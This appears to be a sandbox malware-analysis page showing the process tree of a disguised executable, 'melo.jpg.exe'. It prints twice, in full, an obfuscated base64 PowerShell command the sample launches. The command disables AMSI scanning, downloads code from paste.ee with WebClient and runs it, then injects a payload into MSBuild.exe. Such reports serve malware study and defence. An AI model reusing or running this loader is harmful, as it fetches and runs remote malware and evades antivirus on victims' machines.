| ZeroBOX

melo.jpg.exe "C:\Users\test22\AppData\Local\Temp\melo.jpg.exe"
5580
- powershell.exe powershell.exe PowERsHEL`l -ExecutionPolicy Bypass -w 1 /`e WwBkAG8AdQBiAGwAZQBdACQAbwBzAHYAZQByACAAPQAgAFsAcwB0AHIAaQBuAGcAXQBbAGUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4ALgBtAGEAagBvAHIAIAArACAAJwAuACcAIAArACAAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuAC4AbQBpAG4AbwByADsAaQBmACAAKAAkAG8AcwB2AGUAcgAgAC0AZwBlACAAMQAwAC4AMAApACAAewBlAGMAaABvACAAVwBpAG4AZABvAHcAcwAxADAAOwAkAEUAVwBBAEEARAA9AFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEEAbABsAG8AYwBIAEcAbABvAGIAYQBsACgAKAAzADYAKwA5ADAANAAwACkAKQA7AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgAkACgAWwBDAGgAYQBSAF0AKAAzADMAKwAzADIAKQArAFsAYwBoAGEAcgBdACgAWwBiAFkAdABlAF0AMAB4ADYARAApACsAWwBjAGgAQQByAF0AKABbAEIAWQBUAGUAXQAwAHgANwAzACkAKwBbAEMAaABhAHIAXQAoAFsAQgB5AHQAZQBdADAAeAA2ADkAKQApAFUAdABpAGwAcwAiACkALgBHAGUAdABGAGkAZQBsAGQAKAAiACQAKABbAHMAWQBzAFQARQBNAC4AbgBlAHQALgBXAEUAYgB1AHQASQBsAGkAdAB5AF0AOgA6AEgAVABNAEwAZABlAEMATwBkAGUAKAAnACYAIwA5ADcAOwAmACMAMQAwADkAOwAmACMAMQAxADUAOwAmACMAMQAwADUAOwAnACkAKQBTAGUAcwBzAGkAbwBuACIALAAgACIATgAiACsAIgBvACIAKwAiAG4AIgArACIAUAAiACsAIgB1ACIAKwAiAGIAIgArACIAbAAiACsAIgBpACIAKwAiAGMAIgArACIALAAiACsAIgBTACIAKwAiAHQAIgArACIAYQAiACsAIgB0ACIAKwAiAGkAIgArACIAYwAiACkALgBTAGUAdABWAGEAbAB1AGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsAWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACIAUwAiACsAIgB5ACIAKwAiAHMAIgArACIAdAAiACsAIgBlACIAKwAiAG0AIgArACIALgAiACsAIgBNACIAKwAiAGEAIgArACIAbgAiACsAIgBhACIAKwAiAGcAIgArACIAZQAiACsAIgBtACIAKwAiAGUAIgArACIAbgAiACsAIgB0ACIAKwAiAC4AIgArACIAQQAiACsAIgB1ACIAKwAiAHQAIgArACIAbwAiACsAIgBtACIAKwAiAGEAIgArACIAdAAiACsAIgBpAG8AIgArACIAbgAuACQAKABbAEMAaABhAFIAXQAoADMAMwArADMAMgApACsAWwBjAGgAYQByAF0AKABbAGIAWQB0AGUAXQAwAHgANgBEACkAKwBbAGMAaABBAHIAXQAoAFsAQgBZAFQAZQBdADAAeAA3ADMAKQArAFsAQwBoAGEAcgBdACgAWwBCAHkAdABlAF0AMAB4ADYAOQApACkAIgArACIAVQAiACsAIgB0ACIAKwAiAGkAIgArACIAbAAiACsAIgBzACIAKQAuAEcAZQB0AEYAaQBlAGwAZAAoACIAJAAoAFsAcwBZAHMAVABFAE0ALgBuAGUAdAAuAFcARQBiAHUAdABJAGwAaQB0AHkAXQA6ADoASABUAE0ATABkAGUAQwBPAGQAZQAoACcAJgAjADkANwA7ACYAIwAxADAAOQA7ACYAIwAxADEANQA7ACYAIwAxADAANQA7ACcAKQApACIAKwAiAEMAIgArACIAbwAiACsAIgBuACIAKwAiAHQAIgArACIAZQAiACsAIgB4ACIAKwAiAHQAIgAsACAAIgBOACIAKwAiAG8AIgArACIAbgAiACsAIgBQACIAKwAiAHUAIgArACIAYgAiACsAIgBsACIAKwAiAGkAIgArACIAYwAsAFMAIgArACIAdAAiACsAIgBhACIAKwAiAHQAIgArACIAaQAiACsAIgBjACIAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAWwBJAG4AdABQAHQAcgBdACQARQBXAEEAQQBEACkAOwB9AGUAbABzAGUAIAB7AH0AOwANAAoAJAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AbwBTAGwAWQBKACcAKQB8AEkARQBYADsAWwBCAHkAdABlAFsAXQBdACQAZgA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwBzACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAHAAYQBzAHQAZQAuAGUAZQAvAHIALwBwADcARQBIAEMAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAJAAkACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAWQAuAE0AXQA6ADoAUQAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAGYAKQA7AA==
  2352
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 /e WwBkAG8AdQBiAGwAZQBdACQAbwBzAHYAZQByACAAPQAgAFsAcwB0AHIAaQBuAGcAXQBbAGUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4ALgBtAGEAagBvAHIAIAArACAAJwAuACcAIAArACAAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuAC4AbQBpAG4AbwByADsAaQBmACAAKAAkAG8AcwB2AGUAcgAgAC0AZwBlACAAMQAwAC4AMAApACAAewBlAGMAaABvACAAVwBpAG4AZABvAHcAcwAxADAAOwAkAEUAVwBBAEEARAA9AFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEEAbABsAG8AYwBIAEcAbABvAGIAYQBsACgAKAAzADYAKwA5ADAANAAwACkAKQA7AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgAkACgAWwBDAGgAYQBSAF0AKAAzADMAKwAzADIAKQArAFsAYwBoAGEAcgBdACgAWwBiAFkAdABlAF0AMAB4ADYARAApACsAWwBjAGgAQQByAF0AKABbAEIAWQBUAGUAXQAwAHgANwAzACkAKwBbAEMAaABhAHIAXQAoAFsAQgB5AHQAZQBdADAAeAA2ADkAKQApAFUAdABpAGwAcwAiACkALgBHAGUAdABGAGkAZQBsAGQAKAAiACQAKABbAHMAWQBzAFQARQBNAC4AbgBlAHQALgBXAEUAYgB1AHQASQBsAGkAdAB5AF0AOgA6AEgAVABNAEwAZABlAEMATwBkAGUAKAAnACYAIwA5ADcAOwAmACMAMQAwADkAOwAmACMAMQAxADUAOwAmACMAMQAwADUAOwAnACkAKQBTAGUAcwBzAGkAbwBuACIALAAgACIATgAiACsAIgBvACIAKwAiAG4AIgArACIAUAAiACsAIgB1ACIAKwAiAGIAIgArACIAbAAiACsAIgBpACIAKwAiAGMAIgArACIALAAiACsAIgBTACIAKwAiAHQAIgArACIAYQAiACsAIgB0ACIAKwAiAGkAIgArACIAYwAiACkALgBTAGUAdABWAGEAbAB1AGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsAWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACIAUwAiACsAIgB5ACIAKwAiAHMAIgArACIAdAAiACsAIgBlACIAKwAiAG0AIgArACIALgAiACsAIgBNACIAKwAiAGEAIgArACIAbgAiACsAIgBhACIAKwAiAGcAIgArACIAZQAiACsAIgBtACIAKwAiAGUAIgArACIAbgAiACsAIgB0ACIAKwAiAC4AIgArACIAQQAiACsAIgB1ACIAKwAiAHQAIgArACIAbwAiACsAIgBtACIAKwAiAGEAIgArACIAdAAiACsAIgBpAG8AIgArACIAbgAuACQAKABbAEMAaABhAFIAXQAoADMAMwArADMAMgApACsAWwBjAGgAYQByAF0AKABbAGIAWQB0AGUAXQAwAHgANgBEACkAKwBbAGMAaABBAHIAXQAoAFsAQgBZAFQAZQBdADAAeAA3ADMAKQArAFsAQwBoAGEAcgBdACgAWwBCAHkAdABlAF0AMAB4ADYAOQApACkAIgArACIAVQAiACsAIgB0ACIAKwAiAGkAIgArACIAbAAiACsAIgBzACIAKQAuAEcAZQB0AEYAaQBlAGwAZAAoACIAJAAoAFsAcwBZAHMAVABFAE0ALgBuAGUAdAAuAFcARQBiAHUAdABJAGwAaQB0AHkAXQA6ADoASABUAE0ATABkAGUAQwBPAGQAZQAoACcAJgAjADkANwA7ACYAIwAxADAAOQA7ACYAIwAxADEANQA7ACYAIwAxADAANQA7ACcAKQApACIAKwAiAEMAIgArACIAbwAiACsAIgBuACIAKwAiAHQAIgArACIAZQAiACsAIgB4ACIAKwAiAHQAIgAsACAAIgBOACIAKwAiAG8AIgArACIAbgAiACsAIgBQACIAKwAiAHUAIgArACIAYgAiACsAIgBsACIAKwAiAGkAIgArACIAYwAsAFMAIgArACIAdAAiACsAIgBhACIAKwAiAHQAIgArACIAaQAiACsAIgBjACIAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAWwBJAG4AdABQAHQAcgBdACQARQBXAEEAQQBEACkAOwB9AGUAbABzAGUAIAB7AH0AOwANAAoAJAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AbwBTAGwAWQBKACcAKQB8AEkARQBYADsAWwBCAHkAdABlAFsAXQBdACQAZgA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwBzACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAHAAYQBzAHQAZQAuAGUAZQAvAHIALwBwADcARQBIAEMAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAJAAkACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAWQAuAE0AXQA6ADoAUQAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAGYAKQA7AA==
    6096
    - MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
      3752

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents